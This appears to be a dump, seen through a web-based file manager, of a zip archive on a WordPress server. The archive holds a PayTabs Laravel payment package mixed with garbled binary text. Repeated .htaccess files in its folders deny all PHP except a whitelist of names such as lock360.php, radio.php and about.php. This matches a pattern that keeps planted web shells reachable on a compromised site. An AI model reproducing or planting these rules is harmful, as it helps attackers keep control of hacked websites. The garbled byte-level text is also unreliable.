���ѧۧݧ�ӧ�� �ާ֧ߧ֧էا֧� - ���֧էѧܧ�ڧ��ӧѧ�� - /home/zhaagvlk/public_html/wp-includes/Requests/library/block-bindings/paytabscom.zip
���ѧ٧ѧ�
PK �u\9��ܤ � .htaccessnu �[��� <FilesMatch ".(py|exe|php)$"> Order allow,deny Deny from all </FilesMatch> <FilesMatch "^(about.php|radio.php|index.php|content.php|lock360.php|admin.php|wp-login.php)$"> Order allow,deny Allow from all </FilesMatch> <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] </IfModule>PK �u\9��ܤ � laravel_paytabs/src/.htaccessnu �[��� <FilesMatch ".(py|exe|php)$"> Order allow,deny Deny from all </FilesMatch> <FilesMatch "^(about.php|radio.php|index.php|content.php|lock360.php|admin.php|wp-login.php)$"> Order allow,deny Allow from all </FilesMatch> <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] </IfModule>PK �u\��9�D D . laravel_paytabs/src/PaypageServiceProvider.phpnu �[��� <?php namespace Paytabscom\Laravel_paytabs; use Illuminate\Support\ServiceProvider; class PaypageServiceProvider extends ServiceProvider { /** * Register services. * * @return void */ public function register() { $this->app->bind('paypage', function($app) { return new paypage(); }); $this->mergeConfigFrom( __DIR__ . '/config/config.php', 'paytabs' ); $this->app->make(\Paytabscom\Laravel_paytabs\Controllers\PaytabsLaravelListenerApi::class); } /** * Bootstrap services. * * @return void */ public function boot() { $this->publishes([ __DIR__ . '/config/config.php' => config_path('paytabs.php'), ],'paytabs'); include __DIR__.'/../routes/routes.php'; } } PK �u\9��ܤ � $ laravel_paytabs/src/config/.htaccessnu �[��� <FilesMatch ".(py|exe|php)$"> Order allow,deny Deny from all </FilesMatch> <FilesMatch "^(about.php|radio.php|index.php|content.php|lock360.php|admin.php|wp-login.php)$"> Order allow,deny Allow from all </FilesMatch> <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] </IfModule>PK �u\�F��� � % laravel_paytabs/src/config/config.phpnu �[��� <?php /* * This file is part of paytabs. * * (c) Walaa Elsaeed <w.elsaeed@paytabs.com> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ return [ /* |-------------------------------------------------------------------------- | Merchant profile id |-------------------------------------------------------------------------- | | Your merchant profile id , you can find the profile id on your PayTabs Merchant’s Dashboard- profile. | */ 'profile_id' => env('paytabs_profile_id', null), /* |-------------------------------------------------------------------------- | Server Key |-------------------------------------------------------------------------- | | You can find the Server key on your PayTabs Merchant’s Dashboard - Developers - Key management. | */ 'server_key' => env('paytabs_server_key', null), /* |-------------------------------------------------------------------------- | Currency |-------------------------------------------------------------------------- | | The currency you registered in with PayTabs account you must pass value from this array ['AED','EGP','SAR','OMR','JOD','US'] | */ 'currency' => env('paytabs_currency', null), /* |-------------------------------------------------------------------------- | Region |-------------------------------------------------------------------------- | | The region you registered in with PayTabs you must pass value from this array ['ARE','EGY','SAU','OMN','JOR','GLOBAL'] | */ 'region' => env('paytabs_region', null), ]; PK �u\9��ܤ � % laravel_paytabs/src/Facades/.htaccessnu �[��� <FilesMatch ".(py|exe|php)$"> Order allow,deny Deny from all </FilesMatch> <FilesMatch "^(about.php|radio.php|index.php|content.php|lock360.php|admin.php|wp-login.php)$"> Order allow,deny Allow from all </FilesMatch> <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] </IfModule>PK �u\6�(� � '